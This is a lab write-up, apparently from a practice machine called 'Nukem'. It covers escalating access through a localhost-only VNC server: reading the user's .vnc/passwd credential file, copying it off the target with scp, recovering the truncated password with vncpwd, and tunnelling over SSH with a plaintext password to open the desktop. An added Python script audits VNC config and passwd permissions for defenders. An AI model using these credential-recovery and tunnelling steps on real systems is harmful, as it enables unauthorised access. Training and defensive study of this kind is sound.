VNC
The presence of a VNC instance was initially discovered by enumerating the network. Enumerating the processes further revealed that the VNC instance is started by the commander user. Additionally, PEAS flagged it at a later stage.
Now that I have moved laterally to the commander user, I can get on with the enumeration.
[commander@nukem ~]$ ll .vnc
total 20K
4.0K -rw-r--r-- 1 commander commander 3.4K Jan 30 07:49 nukem:1.log
4.0K drwxr-xr-x 10 commander commander 4.0K Jan 30 07:49 ..
4.0K drwxr-xr-x 2 commander root 4.0K Sep 18 2020 .
4.0K -rw------- 1 commander commander 8 Sep 18 2020 passwd
4.0K -rw-r--r-- 1 commander root 54 Sep 18 2020 config
Checking the .vnc directory reveals the passwd file along with the configuration and log files.
passwd
[commander@nukem ~]$ cat .vnc/passwd
��0�g�
The passwd file is never stored in plaintext, which is why cat prints raw bytes: VNC keeps the password as a single 8-byte DES block encrypted under a fixed key that every implementation ships with, so the file only obfuscates it rather than protecting it.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ sshpass -p CommanderKeenVorticons1990 scp commander@$IP:~/.vnc/passwd .
I copy the file over to Kali with scp so I can work on it offline.
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ vncpwd passwd
Password: Commande
Using the vncpwd tool, I can recover the password from the passwd file: it is Commande. Only eight characters come back because VNC authentication uses at most the first eight characters of a password, so anything longer is cut off when it is stored; here those eight characters are the start of the commander user's SSH password.
config
[commander@nukem ~]$ cat .vnc/config
session=xfce
geometry=1024x728
localhost
alwaysshared
The session is set to xfce and the server is only reachable from localhost. Since the service listens on 127.0.0.1, I cannot reach the VNC server directly from Kali; a tunnel is required.
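As an added example (my own code, not from this write-up or from any VNC project), here is a small audit script for the two artefacts above: it parses a ~/.vnc/config in the format shown, flags exposure settings, checks the passwd file's size and permissions, and shows why vncpwd returned only eight characters. The config format follows the file shown above; the function names, the finding text and the placeholder passwd bytes are constructed for this example.

```python
"""Audit a TigerVNC-style ~/.vnc directory: config exposure and passwd file.

Added example for this write-up, not code from the original post. The
config format (key=value lines plus bare option names such as `localhost`)
and the 8-byte passwd file are as shown above; the function names, the
finding wording and the sample passwd bytes are constructed here.
"""
import os
import stat
import tempfile

# RFB "VNC Authentication" keys DES with the password, so only the first
# 8 bytes of whatever was typed into vncpasswd are ever used.
VNC_PASSWORD_MAX = 8
# The stored passwd file is one DES block of that (padded) password,
# encrypted under a fixed key that every implementation ships with.
VNC_PASSWD_FILE_LEN = 8

# Constructed sample: the config shown in the write-up, verbatim.
SAMPLE_CONFIG = "session=xfce\ngeometry=1024x728\nlocalhost\nalwaysshared\n"


def parse_vnc_config(text):
    """Parse ~/.vnc/config: `key=value` lines become string values, bare
    option names (localhost, alwaysshared, ...) become True; blank lines
    and # comments are ignored."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            cfg[key.strip()] = value.strip()
        else:
            cfg[line] = True
    return cfg


def effective_vnc_password(password):
    """The password a VNC server will actually check: cut to 8 characters."""
    return password[:VNC_PASSWORD_MAX]


def assess_config(cfg):
    """Return (severity, message) findings for a parsed config dict."""
    findings = []
    if cfg.get("localhost") is True:
        findings.append(("info", "bound to 127.0.0.1 only; reachable from a "
                                 "local shell or an SSH port forward"))
    else:
        findings.append(("high", "VNC listens on all interfaces; add "
                                 "`localhost` and tunnel over SSH instead"))
    if cfg.get("alwaysshared") is True:
        findings.append(("low", "alwaysshared: several viewers may attach "
                                "to the same desktop at once"))
    geom = cfg.get("geometry")
    if isinstance(geom, str):
        width, _, height = geom.partition("x")
        if not (width.isdigit() and height.isdigit()):
            findings.append(("low", f"geometry {geom!r} is malformed"))
    return findings


def assess_passwd_file(path):
    """Check a stored VNC passwd file: exactly one DES block, and readable
    by the owner only, because the DES key is fixed and public."""
    findings = []
    st = os.stat(path)
    if st.st_size != VNC_PASSWD_FILE_LEN:
        findings.append(("high", f"unexpected size {st.st_size}, expected "
                                 f"{VNC_PASSWD_FILE_LEN}"))
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(("high", "passwd readable by group/other; anyone who "
                                 "reads it recovers the password"))
    findings.append(("info", "VNC uses at most 8 password characters; a "
                             "longer passphrase adds no strength here"))
    return findings


def make_sample_vnc_dir(passwd_mode=0o600):
    """Build a throwaway .vnc directory with the sample config and a
    constructed 8-byte passwd (not the real file). Returns both paths."""
    vnc_dir = tempfile.mkdtemp(prefix="vnc-audit-")
    config_path = os.path.join(vnc_dir, "config")
    passwd_path = os.path.join(vnc_dir, "passwd")
    with open(config_path, "w") as fh:
        fh.write(SAMPLE_CONFIG)
    with open(passwd_path, "wb") as fh:
        fh.write(b"\x00" * VNC_PASSWD_FILE_LEN)  # constructed placeholder block
    os.chmod(passwd_path, passwd_mode)
    return config_path, passwd_path


if __name__ == "__main__":
    config_path, passwd_path = make_sample_vnc_dir()
    with open(config_path) as fh:
        cfg = parse_vnc_config(fh.read())
    for sev, msg in assess_config(cfg) + assess_passwd_file(passwd_path):
        print(f"[{sev}] {msg}")
    print("effective VNC password for the SSH password:",
          effective_vnc_password("CommanderKeenVorticons1990"))
```

Run against the sample directory it reports the localhost binding as informational, alwaysshared as low, and the passwd file as owner-only; the effective-password helper shows that CommanderKeenVorticons1990 becomes Commande at the VNC layer, which is exactly what vncpwd recovered. Dropping the localhost line from a config turns the binding finding into a high, which is the setting a defender should look for on any host running a VNC server.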
SSH Tunneling
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ sshpass -p CommanderKeenVorticons1990 ssh -f -N -L 5901:127.0.0.1:5901 commander@$IP
This forwards Kali's port 5901 to the target system's 127.0.0.1:5901 socket over SSH: -L sets up the local forward, -N tells ssh not to run a remote command, and -f sends the session to the background once it is up.
Starting A VNC Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ vncviewer -passwd ./passwd localhost:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "nukem:1 (commander)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Session established
Nothing of interest turns up in the session itself, but I can attempt to [[Nukem_Privilege_Escalation#|leverage]] the SUID dosbox binary.